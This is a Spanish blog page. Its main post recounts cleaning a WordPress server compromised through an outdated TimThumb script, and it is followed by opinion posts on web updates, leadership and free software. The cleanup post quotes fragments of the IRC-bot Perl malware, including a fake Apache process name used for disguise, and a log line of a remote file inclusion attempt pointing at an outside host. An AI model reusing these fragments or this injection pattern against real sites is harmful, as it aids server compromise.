viernes, 23 de marzo de 2012

Resolución problema común en servidores relacionado con Timthumb


Además de tener una buena fachada, los pilares de tu web deben ser resistentes

Hay muchos servidores que son utilizados por organizaciones externas muy bien equipadas y organizadas con procesos totalmente automatizados que pueden explotar el servidor donde tienes alojada tu web sin tener ni siquiera que enterarte de ello. Así tu web a veces va muy lenta o simplemente no va, o aparece un mensaje en árabe o en chino o en cualquier idioma diciendo que que tu web ha sido crakeada (ojo, no hackeada). Por eso cuando alojas una web lo mejor es que lo hagas con una empresa con solvencia de recursos técnicos suficientes, que tengan al menos los suficientes medios para avisar de los ataques antes de que ya te hayan destrozado todo. Claro, luego está la labor del profesional asignado que tengas detrás de tu web para el mantenimiento. Piensa que lo más importante es que se mueva en el entorno LAMP (Linux, Apache, MySQL, PHP) como pez en el agua. Recuerdo hace unos cuantos años cuando di uno de los primeros cursos de Diseño y mantenimiento de webs y tuve que hacerlo con Windows por exigencias externas...no me quiero ni acordar. Windows es para aficionados. El mundo web es de Linux. Los pocos que quieren alojar sus webs en un servidor Linux con IIS tienen tarifas más caras.

Una experiencia cotidiana

Recientemente tuve que migrar un portal con bastante material de un servidor a otro y me encontré con varias sorpresas. Dicho portal estaba abandonado desde hacía meses. Utilizaba Wordpress como gestor de contenidos pero no se habían preocupado de actualizar plugins ni el propio WordPress. Tampoco habían actualizado el tema claro, así que como éste usaba el Timthumb para gestionar las imágenes se encontraba bastante desfasado y por aquí empieza todo.
Aprovechando una vulnerabilidad de este programa, frecuentemente usado para la manipulación de imágenes, los atacantes pueden cargar y ejecutar contenido en PHP, Perl,... Una forma es mediante un fichero que aparentemente es un fichero txt, por ejemplo en mi caso era 2.txt y se encontraba en el directorio raíz del tema, dentro de wp-content.
Las primeras líneas de código:
#!/usr/bin/perl
####### DON'T MODIF IT or SCRIPT NOT WORK #######
y donde dan la alarma al servidor es con:
my $fakeproc = "/usr/sbin/apache2 -k start";
Es una especie de radar que detecta ficheros timthumb.php o thumb.php vulnerables.
Van a intentar crear una backdoor (puerta de atrás) para evitar los sistemas de seguridad y poder acceder al sistema.
En ese punto es donde nuestro servidor debe detectar el ataque y bloquearse. En mi caso, en un alojamiento profesional de OVH, el dominio afectado se encuentra con el Firewall aplicativo activado. El papel de un firewall aplicativo es de filtrar las peticiones entrantes en un servidor HTTP Apache. Se presenta bajo la forma de un módulo apache, que analiza las peticiones recibidas gracias al empleo de una base de reglas de peticiones consideradas como no deseables. El inconveniente es que puede ralentizar el sitio web. Aquí es donde debemos valorar si queremos más seguridad o más velocidad. En el caso de un alojamiento multidominio yo apostaría por la seguridad y potenciando un poco más las características del servidor para compensar y no perder velocidad.
Al copiar todo el material, pasaron los ficheros maliciosos ya del otro servidor, por ejemplo en una carpeta de información diversa había un fichero denominado svd que en realidad es una script Perl con algunas líneas de código como las siguientes:
...
#Nickname of insect
my $ircname =$nickname[rand scalar @nickname];
$servidor = $ARGV[0] unless $servidor;
my $porta = $ARGV[1];
my @canais = ('#'.$ARGV[2]);
my @adms = ("DCOM");
my $processo = $ARGV[4];
chop (my $realname = `hostname`);
...
se utilizan para crear un IRC que puede ser usado por ejemplo para detectar canales para envío de publicidad,..., o en este caso concreto para conversaciones entre usuarios, unos 400 aproximadamente, y parece que originarios de Brasil por los nombres e idioma.

Lo importante es que el servidor detectó el problema en cuanto algún robot programado de los que se usan en estos casos disparó el proceso. En ese mismo momento los servicios de OVH me envían al correo un mensaje explicando que han detectado la incidencia:

“Nuestro sistema de vigilancia (Okillerd) ha detectado una operación irregular
en su sitio web.
Los detalles de la operación son los siguientes :
dominio.com
Problema encontrado  : Hidden PERL script
Comando aparente     : /usr/sbins/data
Ejecutable utilizado : /usr/bin/perl
Fecha: Thu Mar 15 00:42:33 CET 2012
Esto no es autorizado en nuestras instalaciones, ya que es una tentativa
potencial de piratería.”
A partir de ahí podemos rastrear cómo fue el ataque viendo los logs del registro del dominio mencionado a la hora exacta yendo para atrás hasta que encontremos una entrada incorrecta, diferente del resto. Para interpretarlo mejor tener algún conocimiento de Apache o consultar alguna guía al respecto. En un alojamiento profesional es indispensable tener activado este servicio de registro de logs. Vemos por ejemplo :
65.39.172.139 www.*********.net - <23/Oct/2004:10:57:19 +0200> "GET /www_dominio/index.php?page=http://65.39.172.139:113/ HTTP/1.1" 200 1793 "-" "curl/7.9.8 (i686-pc-linux-gnu) libcurl 7.9.8 (OpenSSL 0.9.6b) (ipv6 enabled)"
que aquí el script vulnerable es index.php en el directorio “www_dominio” y que están atacando el puerto 113.



Otra forma de resolver el problema es buscar el string que nos envían utilizado en el ataque, en este caso “/usr/bin/perl”.



Para ello tenemos que utilizar SSH y acceder a nuestro servidor. Aunque esté bloqueado al exterior, nosotros podemos acceder. En este caso,


e introducimos nuestra password a continuación.Ahora puedo buscar la cadena de caracteres que han utilizado en el ataque mediante un comando del bash como:
yestilo@ssh1:~$ grep -r “/usr/bin/perl” www
y ahora a esperar. Esto nos puede llevar bastante tiempo, depende del tamaño del área a buscar. También podríamos realizar otra estrategia que podría ser bajarnos todo el contenido desde el servidor a nuestro ordenador y hacer la búsqueda directamente en él. Eso podríamos hacerlo con ftp o también con scp. Yo en este caso lo hice de esta forma:


es decir
  scp -r usuariossh@direccionnssh:directorioservidor directoriolocal,

de forma recursiva (-r, minúscula, ojo). Esta es una forma más rápìda de bajarnos todo el contenido. Una vez con todo en nuestro directorio en nuestro equipo, podemos realizar de nuevo la búsqueda y va a ser muchísimo más rápido.

De nuevo, con grep recursivo:
lmcuende@yestilo:~$ grep -r “/usr/bin/perl” backups
busco la cadena “/usr/bin/perl” en el directorio backups y me van apareciendo los ficheros donde se encuentra:
backups/dominio/wp-includes/theme-compat/.about:#!/usr/bin/perl
backups/dominio/wp-content/themes/Theme/2.txt:#!/usr/bin/perl
backups/dominio/own/l10n/l10n.pl:#!/usr/bin/perl
backups/dominio/info/svd:#!/usr/bin/perl
Como podemos observar el fichero “.about” es un fichero oculto, el fichero “2.txt” parece un simple fichero de texto, “l10n.pl” es un programa en Perl, y “svd” viene sin etiquetar. Una vez comprobados los ficheros, yo los abro con Geany, observo lo que hacen y ahora ya me dispongo a borrarlos. Seguramente con ftp no los pueda borrar así que de nuevo me conecto por ssh al servidor y los borro con rm:

introduzco la password que me pide, y me dirijo al directorio:
yestilo@ssh1:~$ cd www/dominio/wp-includes/theme-compat/
yestilo@ssh1:~$ rm .about
y así sucesivamente con los otros tres ficheros maliciosos. Al mismo tiempo puedo estar usando un entorno gráfico para ver los ficheros. Yo en este caso estoy usando Nautilus 3.2.1 sobre Asturix 4 trabajando con el entorno de escritorio Asturix On, que me es muy cómodo para desarrollo, con dos pantallas para optimizar más mis movimientos. Hay que acordarse de activar “Mostrar los archivos ocultos” en “Ver”. Accedo directamente como ftp al crear un acceso a través de “Archivos”, “Conectar con el servidor” y dando los datos del ftp.

Actualizar los archivos “timthumb.php” y/o “thumb.php”

Ahora tenemos que corregir los archivos “timthumb.php” o “thumb.php” que tengamos en el servidor. Si sabemos su ubicación simplemente con abrirlos y modificar su contenido con la última versión, ya sirve. Yo lo voy a hacer así. A través de Nautilus me muevo por el servidor, encuentro el archivo y lo abro con Geany. En el navegador (yo utilizo Chromium) busco la dirección del archivo oficial de Timthumb: http://timthumb.googlecode.com/svn/trunk/timthumb.php y observo en las primeras líneas de código que ya va por la versión 2.8.10. Copio todo el contenido y se lo pego al archivo de mi servidor, y listo. Bueno, algo más, podemos aumentar aún la seguridad modificando el valor del parámetro 'ALLOW_EXTERNAL' que aparece en la línea 32 de “TRUE” a “false”.
 Otra forma de resolverlo es instalar un plugin que se ocupa de actualizar la versión de Timthumb. Esto es recomendable para quien lo desee hacer de una forma más cómoda y además nos encuentra todos los archivos timthumb.php en los temas, plugins,...A través del Wordpress se puede instalar directamente buscando por Timthumb (ya aparece el primero en la lista ). Para más información también en el enlace: http://wordpress.org/extend/plugins/timthumb-vulnerability-scanner/ 
Y en principio está resuelto el problema, aunque yo aconsejo seguir buscando algún rastro más por si el atacante deja su puerta abierta para volver en otra ocasión. 

Reactivando el servicio web

 Es el momento de activar de nuevo nuestro portal, o portales si se trata de un alojamiento compartido. En este caso, el sistema de vigilancia (Okillerd) de OVH ha modificado los permisos para que no se pueda entrar, así que tenemos que cambiarlo. De nuevo, accedemos al servidor con ssh como en las otras ocasiones y ya directamente cambiamos los permisos con chmod: yestilo@ssh1:~$ chmod 705 www yestilo@ssh1:~$ chmod 705 . yestilo@ssh1:~$ chmod 705 / y ya podemos comprobar que nuestro sitio web vuelve a funcionar. Es importante que resolvamos el problema antes de activar nuestro sitio web porque de lo contrario el control de los crakers va aumentando. Muchas veces la gente se pregunta, ¿por qué irá tan lenta esta web? En esos momentos es posible que la estén utilizando para envío masiva de publicidad, o incluso algo peor, para realizar phising, en cuyo caso tarde o temprano le llegará un aviso serio de alguna entidad muy usada para esto como el Bank of America por ejemplo.

Recomendaciones

Por tanto, y como conclusión, una serie de recomendaciones para tener su web más optimizada, rápida y segura:
- Tener todo el software al día.

- Utilizar Linux. La inmensa mayoría de los servidores de webs trabajan con una distribución Linux. Emplearlo es una garantía de que va a poder acometer tareas de una forma mucho más rápida, eficiente y sencilla. Así que de paso, ponga también Linux en su equipo de desarrollo. El entorno LAMP (Linux, Apache, MySQL, PHP) es actualmente el más usado. Eso no quiere decir que sea eterno. Todo irá cambiando y podremos probar Cherokee, Nginx, etc. en vez de Apache, aunque eso nos cueste horas y horas generalmente de autoaprendizaje.


- Tener contratado servicio de SSH con el servidor. Eso nos da una libertad y autonomía que no tendríamos de otra manera a la hora de cambiar permisos, borrar ficheros, etc.


- Por supuesto, un buen servicio de copias de seguridad,de tal forma que siempre podamos restaurar desde una copia de hace un día, dos, una semana,...

En este post he intentado describir de la forma más sencilla posible la forma de resolver un conflicto determinado que desgraciadamente se ha hecho bastante popular. Por ello que me perdonen los expertos en Linux por hacer referencia a obviedades y también hay otras formas de resolverlo con ortos comandos. El ejemplo se ha realizado con un servidor de OVH pero podría haber sido de cualquier otro proveedor de alojamiento.

martes, 13 de marzo de 2012

Actualiza tu web o elimínala


Web operativa desde el 2007 sin cambios
Hace años el desarrollo de “páginas web” estaba en manos de los diseñadores de imagen. Utilizaban tablas, colocaban unas cuantas imágenes, acompañaban con textos utilizando marcos, y ¡voilà! En muy pocas horas tenían el producto, muy aparente, pero muy poco efectivo. Eran webs casi todas estáticas (aunque algunos pensaban que por moverse las imágenes eran dinámicas :), presenciales, con un gran problema para actualizar. Los autores tenían que hacerlo casi siempre. El marcado era desastroso. Si Vd. tiene una de esas de hace más o menos 5 años (aunque aún hay diseñadores que siguen trabajando así porque no han sido capaces de aprender a programar) verá que su web aparece muy olvidada por los buscadores, y es que la penalizan hasta tal punto que ni aparece en portada cuando busca su propio nombre de dominio.
En unos años todo ha cambiado por completo. Todo se realiza por código. Tanto el PHP de lado del servidor como el Javascript del lado del cliente tienen ahora casi todo el soporte del tratamiento de la información de lo que se ha dado en llamar web 2.0. Por otro lado la evolución en el marcado con el nuevo lenguajes HTML5 y la implantación del pseudo-lenguaje CSS3 han determinado ya la obligación de separar el código de los estilos, y todos estos de la información que se suele estructurar en bases de datos.
Pero si piensa que esto va a durar se equivoca. Por un lado las bases de datos están experimentando una profundo cambio, tanto que las nuevas ya se llaman No Relacionales (MongoDB, Cassandra, CouchDB, Hypertable,...), es decir, niegan totalmente la estructura de las anteriores, de hecho también se llaman vulgarmente NoSQL.
Además la extensa utilización de dispositivos móviles obligan a que nuestra web esté preparada para visualizarse correctamente en smartphones, tablets, etc. y este entorno está en constante cambio.
Por otro lado, el aliciente de complementar los sitios web con la gestión del propio negocio a través de “la nube” está provocando la aparición de un buen número de herramientas y librerías como Node.js. Estas técnicas aumentan tanto la productividad y ahorran tantos costes (teletrabajo) que todas las empresas se están lanzando a esta evolución, y esto no sólo es para las grandes empresas sino para los autónomos, asociaciones, entidades de todo tipo, porque ahora todos los productos más innovadores son escalables y basados en software libre lo cual ha abaratado muchísimo los costes.
Así que piense qué es lo que tiene. Indague por la red y súbase al carro de la evolución si quiere a su empresa/organización, y siempre piense que cualquier solución debe basarse en software libre si quiere independencia, actualización e innovación.
Es posible en estos momentos que su web corporativa ya sea ridícula. En ese caso es mejor que la anule si no es capaz de actualizarla. Una visión paupérrima de su empresa es más nefasta aún que no estar en Internet.
Rechace los consejos de los aficionados. Tener su espacio web al día requiere más que nunca el trabajo de un profesional que demuestre estar al día y que ame el código.
“El futuro está escrito en líneas de código”, Rasmus Lerdorf (creador PHP). “El código es poesía”, WordPress

Últimamente he tomado dos ciudades y he analizado unas 600 webs realizadas por la misma empresa en los últimos siete años. Casi todas están hechas con el mismo patrón cambiando colores, imágenes y textos. Casi todas están desactualizadas porque utilizan un gestor de contenido poco operativo, difícil y engorroso. Están pagando un dinero para nada. Cambiar ahora es sencillo, sobre todo con el nuevo servicio webserving.

sábado, 4 de febrero de 2012

Los perritos de las ciudades ¿evolución o involución?


Los líderes
Es curioso observar cómo son tan necesarias esas figuras y al mismo tiempo qué daño pueden ocasionar a un colectivo entregado en cuerpo y alma a decisiones que no siempre son las más favorables para ellos. Durante años he intentado entender por qué un partido político con ideas colectivas no podía tener un liderazgo colectivo hasta que por fin me di de baja como afiliado y descansé al comprobar que el propio colectivo no quería liderar, necesita a alguien en quien personificar el triunfo, el fracaso y todos los demás hitos asociados. Viví el 15M con intensidad desde el principio y cuando alguien dijo en Girona en el Foro Impulsa “Se trata de una demostración de la inteligencia colectiva” me sentí halagado y más identificado que nunca, pero a medida que pasa el tiempo y el movimiento se extiende por todo el mundo, se organiza y fortalece en la sombra me doy cuenta de que el principal colectivo quizás no sea tan inteligente como para razonar que el cambio pasa por que el colectivo sea el líder de los cambios, es decir, generar un paso más en la evolución del ser humano, algo demasiado atrevido por el momento, pero no descartable en un futuro próximo.
Los perritos de las praderas
Así esta introducción me lleva a una de mis primeras conclusiones: los humanos somos muy parecidos a ciertos animales. En realidad no hemos evolucionado tanto como creemos. Si tomamos como ejemplo una especie que nos puede parecer tan insignificante como los perritos de las praderas (Cynomys ludovicianus) observamos que estos roedores tienen un comportamiento prácticamente idéntico al nuestro. Lo cierto es que
  • utilizan un sofisticado sistema de comunicación vocal (nuestros idiomas ¿no lo son?)
  • tienen muy desarrolladas sus capacidades cognitivas (algunos humanos se escapan a esta similitud),
  • hay dudas sobre si la llamada de alarma ante un depredador (los “mercados” por ejemplo) que utilizan es altruista o egoísta en el sentido de si la utilizan para ayudar a que los demás se protejan a sí mismos o tienen el propósito de causar confusión y pánico en los grupos y hacer que estos sean visibles también al depredador (muy similar al lenguaje utilizado por las agencias de calificación de riesgos).
  • La expresión corporal más notoria de un perrito de las praderas es en la llamada territorial, lo que algunos han denominado el “jump-yip”, en posición totalmente vertical estira sus patas delanteras en el aire y hace que los demás hagan lo mismo (sin comentarios).
Liderar: la batalla por el poder
Se agrupan de forma territorial (países, comunidades, ciudades,...) y se defienden todos juntos cuando aparece un intruso. Generalmente los atacantes son jóvenes de otros grupos que han alcanzado la madurez ( en los humanos a veces estos “jóvenes” alcanzan su madurez a los 50, 60 o más) y que quieren integrarse en nuevas familias (senado, congreso,...) por llamarlo de alguna manera y pretenden en el momento oportuno liderar esta nueva familia (portavoces, ministros,...). Es curioso cómo actúan en grupo para escoger el líder.
Una semana antes de la decisiva confrontación el candidato comienza su “campaña” (campañas electorales, primarias, …) por la conquista del poder con el grupo que quiere ganar. Esto requiere diplomacia, tacto, inteligencia y perseverancia.
La táctica consiste en permanecer el mayor tiempo dentro del grupo cortejado, ser discretos y no mostrar temor. Tratan de actuar como si fueran parte del grupo. Intentan hacer muchos amigos (algunos como Berlusconi incluso los compran...), tratan de seducir a las hembras “solteras” (estoy hablando de los perritos de las praderas por si alguien me sugiere este comentario machista),...
Cuando el aspirante ya siente la receptividad del grupo comienza a desafiar al líder a la lucha. Si lo vence ya es aceptado y reconocido como nuevo líder para todo el grupo.
Del análisis de estas experiencias podemos identificar una serie de cualidades que debe tener un líder:
  • capacidad de ganar concursos (elecciones)
  • buenas habilidades de comunicación (si no, hay agencias de publicidad caras pero excelentes)
  • capacidad de mando para mantener la cohesión 
  • capacidad de identificar amenazas, riesgos y oportunidades
El grupo seguirá al líder porque creerá que éste les va a garantizar su seguridad con las decisiones que tome. Y esto garantiza la continuidad de las especies.

Mi particular conclusión
Cada uno que saque su conclusión. Yo prefiero pensar que ante la creciente escasez de auténticos líderes el ser humano va a ser capaz de evolucionar hacia un estadio en que se instrumentarán métodos más avanzados en que las decisiones las tomemos todos de acuerdo con unos parámetros de seguridad que no originen catástrofes como las actuales, basadas casi siempre en decisiones de monigotes puestos a la cabeza de nuestros grupos que obedecen fielmente las ordenes de nuestros depredadores más peligrosos (los grupos de seres humanos ambiciosos y sin escrúpulos que están originando con su poder la desesperación y el abandono de los más débiles).
Los perritos de las ciudades se mueven por madrigueras pero sus depredadores vuelan en jets. El espacio es más difícil de controlar. Las madrigueras, por complejos que sean los entramados siempre tienen unos orificios que se pueden cerrar.

sábado, 21 de enero de 2012

Colegio Ártica: Una fiesta contra el analfabetismo digital


Acercar los sistemas de información y comunicación actuales a las familias es una operación muy difícil y penosa en una sociedad donde nadie se atreve a medir el analfabetismo digital. El término alfabetización no tiene edad, se puede aplicar por igual a niños y adultos. Ya nos avisó Javier Solana cuando era ministro de Educación (1988-1992) cuando dijo que “estamos ante un nuevo tipo de analfabetismo: el digital” y ese es un peligro que puede producir efectos muy negativos en el desarrollo de un país. Veinte años después una Ministra de Cultura (la más impopular de la historia de España) decía que estaba con los artistas “analógicos” queriendo decir que penalizaba a los que utilizaban las técnicas digitales. Ese es un claro ejemplo de la evolución político social de un país con un índice de productividad aparcado en el sótano y un índice de paro viviendo en el ático.

Síntomas de analfabetismo digital

Cuando Juan García Fernández, treinta y cinco años, director de Marketing de una compañía se expresa con frases como “Por favor Ana, mándame un word con los nombres de los asistentes a la reunión y una excel con las valoraciones de las mejores ofertas...” estamos ante un caso típico de analfabeto digital. Es posible que Juan sea licenciado, ingeniero,... que tenga varios masters... pero ha sufrido una educación durante años muy sesgada en centros educativos que utilizaban sólo una herramienta de las miles que existían. En su universidad más de lo mismo. Ana posiblemente esté utilizando un Writer de OpenOffice para redactar el documento y es posible que se lo envíe a Juan en un formato abierto como PDF, pero Juan no habla de “documento”, no le pide a Ana un documento en formato abierto, es posible que no sepa qué es eso. Y es posible que tenga un smartphone de última generación trabajando con un sistema operativo basado en GNU/Linux y no sepa que está utilizando un sistema operativo de código libre.
Cuando en un centro educativo se utiliza sólo un sistema operativo se está privando a los alumnos/as de la enorme riqueza de la diversidad. Se les está privando del conocimiento porque muchos de ellos saldrán del centro pensando que no hay más sistemas operativos. Es como si retrocediésemos muchos años cuando sólo existía un canal de televisión. Imagínate llegar a casa y no poder cambiar de canal de TV, sólo tener uno. Eso es lo que ocurre en la mayor parte de los centros educativos de este país, sólo utilizan un canal.

Install Party JRO (Cooperativa de enseñanza José Ramón Oreto) http://apuntatealafiesta.com/

La innovación y el progreso en una educación de calidad pasa por difundir la Cultura Libre

Enseñar a los alumnos a elegir las herramientas más adecuadas para cada tarea o para cada momento, o persona,... es tan importante para los ciudadanos del futuro que el equipo de docentes de la Cooperativa de Enseñanza José Ramón Otero de Madrid ha decidido realizar una “install party” como popularmente se conoce a un evento donde la fiesta consiste en difundir la Cultura Libre con ejemplos prácticos como la instalación de sistemas operativos libres (Linux) en equipos y ayudar a la gente a saber un poco más sobre la libertad que tienen para elegir entre miles de aplicaciones informáticas totalmente legales que se pueden descargar de Internet.
Proyecto Asturix, asociación de emprendimiento social tecnológico cuya principal misión es difundir la Cultura Libre no podía quedarse al margen de esta iniciativa. Por eso no sólo la apoyamos sino que participamos activamente en la misma. Un equipo de la Comunidad Asturix se desplazará al Colegio Ártica encabezados por el líder y fundador de Proyecto Asturix, Luis Iván Cuende para participar con una charla, en el área de exposiciones y en el área de instalaciones durante toda la “install party”.
La charla será hacia las 13,00 aprox. “Asturix 4. La innovación del escritorio On”, por Luis Iván Cuende, en el salón de actos del Colegio Ártica.

Entregaremos un CD con Asturix 4 a todos aquellos que lo instalen durante el evento o lo traigan instalado en su equipo.

Lugar: Colegio Ártica – C/Los Morales, 25. Madrid - Metro Línea 11 (La Peseta)
Fecha: Sábado 28 de Enero 2012
Horario: 10,30-11,00 hasta las 17,00 aprox.
Entrada libre.

lunes, 16 de enero de 2012

El código ausente en Alemania está presente


Nota. este artículo ya se publicó hace meses en la revista "Solos", pero sigue igual de vigente.

Antecedentes

Mientras administraciones, fundaciones y demás entendidos lanzan informes continuamente del gran avance de la presencia en Internet de los autónomos y su cada vez mayor uso de las redes sociales nos enfrentamos a una política tan errónea como perversa.
Para las administraciones es muy fácil “impulsar” el uso de las redes sociales porque los costes que representa son exclusivamente de difusión de unas herramientas en las que no tienen que hacer absolutamente nada. Todas están en manos de grandes corporaciones que ven crecer sus beneficios con sus corrales a rebosar de tantas cabezas que a veces ponen a prueba su sistema de escalabilidad.
Si alguna entidad fuese lo suficientemente competente y atrevida haría un estudio sobre dos aspectos: Gestión y Comunicación en el colectivo del Trabajo Autónomo. La Comunicación no sirve de nada si no existe Gestión.

Episodio I: Versión española: “La hora feliz”

Si analizamos la vida cotidiana de cualquier autónomo veremos cómo prepara los presupuestos, en documentos “word”, en el mejor de los casos tiene sus productos o servicios en una base de datos “access” o en una “excel”, porque claro los cursos que se organizan para ellos no son genéricos de manejo de un tratamiento de textos sino “Curso de Microsoft Word”, como si no hubiera otros incluso mucho mejores.

Situación: Doce de la noche. Después de cenar. Cansado.
Obligación: Tiene que llevar el presupuesto mañana a primera hora a la empresa X.
Herramientas: Ordenador de sobremesa con impresora y conexión adsl.
Sistema de gestión: Windows XP pirata, Microsoft Office 2003 pirata, antivirus gratuito, IExplorer 6 (de hace doce años),...
Procedimiento:
  1. Encendido del ordenador. Paciencia, el sistema tiene que cargar todo.
  2. Aviso: Su sistema no tiene licencia original...
  3. Aviso: Actualización de Java...
  4. Aviso: Su antivirus está desfasado...
  5. 10 minutos después... se abre el “word”. Abrir,documentos recientes,... se carga el último presupuesto que hizo y se dispone a cambiarlo con los nuevos datos: la fecha, el número de presupuesto, la dirección...hay que buscarla, “¿dónde estará la tarjeta que me dió el encargado de la empresa?”.
  6. 10 minutos después de buscar la tarjeta por los armarios, cartera,...estaba en el bolsillo de la camisa en la lavadora, menos mal que aún no la había puesto a funcionar.
  7. Ordenador con un aviso en el correo: Pepita Lencería quiere ser tu amiga...Se abre Facebook. La noche está caliente. La gente está opinando del partido de la final. Pulsa el botón de confirmar amistad y se va al muro. El ratón se desliza por una cuesta sin final hasta el video del primero golazo, por la escuadra. Abre el video y se recrea recordando esos instantes inolvidables. Pone un comentario, quiere dejar huella en el momento histórico.
  8. 20 minutos después pulsa en la pestaña del “word”...ahora van los datos. Los metros de parquet que hay que acuchillar y barnizar están en... el bloc de notas. “¿Lo dejé en la mesa de entrada con las llaves y la cartera?. Pues no. En el coche. Hay que bajar al garaje.
  9. 10 minutos después con libreta en mano dispuesto a calcular los datos para el presupuesto llega un aviso del chat de Facebook:
    - “¿Vamos juntos mañana a la asamblea de la asociación?”
    - “Vale”.
    - “¿En tu coche o en el mío?”
    - “En el tuyo”.
    - “¿Tomamos antes una cerveza?”
    - “Vale”.
    - “¿Dónde?”
    -...
  10. 10 minutos después calculadora en mano va calculando los precios metro cuadrado con el barniz, que por cierto ha subido (“¿Dónde estará el nuevo precio?. Es tarde, pongo el precio del anterior presupuesto y listo”. Tabulador, decimal, queda descolocado, da igual. El importe en negrita. Da al icono del diskette y salva el documento para que no se pierda, claro que no se da cuenta que ¡ha perdido el anterior!.
Pensamiento interior: “Soy un hacha. Cómo manejo el ordenador. En un ratillo he hecho un presupuesto he visto los goles, he quedado con Pepe para mañana y mira qué hoja más guapa le voy a dar al estirado ese de la corbata mañana. Esto de las nuevas tecnologías es una maravilla. Si no fuera por los ordenadores...”.

Episodio II: Con K de Kontrol

Situación: Cinco de la tarde. Antes de cenar. Cansado.
Obligación: Tiene que llevar el presupuesto mañana a primera hora a la empresa X.
Herramientas: Ordenador de sobremesa con impresora y conexión adsl.
Sistema de gestión: Knoppix, LibreOffice, Gimp, FireFox,...Sistema de Gestión de Presupuestos desarrollado en Python y la biblioteca py GTK como entorno gráfico multiplataforma desarrollado por la Mitteldeutschen Zimmerer con fondos públicos para los autónomos de la madera.

Procedimiento:

  1. Encendido del ordenador.
  2. ½ minuto después se abre el entorno KDE.
  3. 1 minuto después comprobación del correo con Kontact.
  4. ½ minuto después... se abre el Budgetkontrolle 2011 (aplicación de presupuestos).
  5. En 2 minutos escoge el cliente en un cuadro combinado, aplica una modificación de un incremento en sus tarifas de un 3%, accede en otra venta a la nube a insertar las fotos del local que sacó con su móvil al directorio del cliente.
  6. Ordenador con un aviso en el correo: Pepita Lingerie quiere ser tu amiga...
  7. Se abre Facebook. Abre el perfil público de Pepita Lingerie. No le interesa. Borra el correo del Kontact. Cierra la pestaña de Facebook.
  8. 1 minuto después pulsa en la pestaña del Budgetkontrolle 2011...ahora van los datos. Los metros de parquet que hay que acuchillar y barnizar están en Google Docs. Los metió en una hoja de cálculo a traves de su móvil con Android cuando estaba sobre el terreno.
  9. 1 minuto después de introducir los datos a mano en la aplicación llega un aviso del chat de Facebook:
    - “¿Vamos juntos mañana a la asamblea de la asociación?”
    - “Vale. Quedamos a las 15,55 horas en el hall de la asociación y tomamos un café en la máquina”.
    - “OK”
  10. 1 minuto después de revisar que todos los datos están correctos, pulsa al botón de Imprimir, y el presupuesto está listo.
    Pensamiento interior: “Esto de tener que meter los datos variables de la aplicación a mano es un incordio. Voy a proponer mañana a los informáticos de la asociación que incorporen el código necesario para poder importarlos directamente de una hoja de cálculo de Open Office o Libre Office, o directamente de Google Docs, al fin y al cabo todo es CÓDIGO ABIERTO. Ahora... a preparar la cena, que tengo un hambre... ”.


Moraleja: Si un trabajador alemán (sea autónomo o no) gana mucho más que un trabajador español no es por casualidad.
Potenciar la productividad se hace sobre todo con mejorar la gestión y en la actualidad existen medidas más que suficientes para hacerlo. El gobierno alemán lleva impulsando varios años el Software Libre. Cuando hace casi dos años Matthias Ettrich, fundador del proyecto KDE, fue condecorado por el Gobierno Alemán con la Cruz Federal del Mérito por su contribución al Software Libre (la medalla fue entregada en reconocimiento a su trabajo para incentivar la innovación y expandir el conocimiento por el bien común) en España prácticamente acababan de dar el Premio Principe de Asturias a Bill Gates, no se sabe muy bien por qué.

Conclusión: La precaria imagen de la clase política española tampoco es casual. Como tampoco es casual que muchos porofesionales “del código” quieran dejar nuestro país e irse a Alemania, donde pueden desarrollar su profesión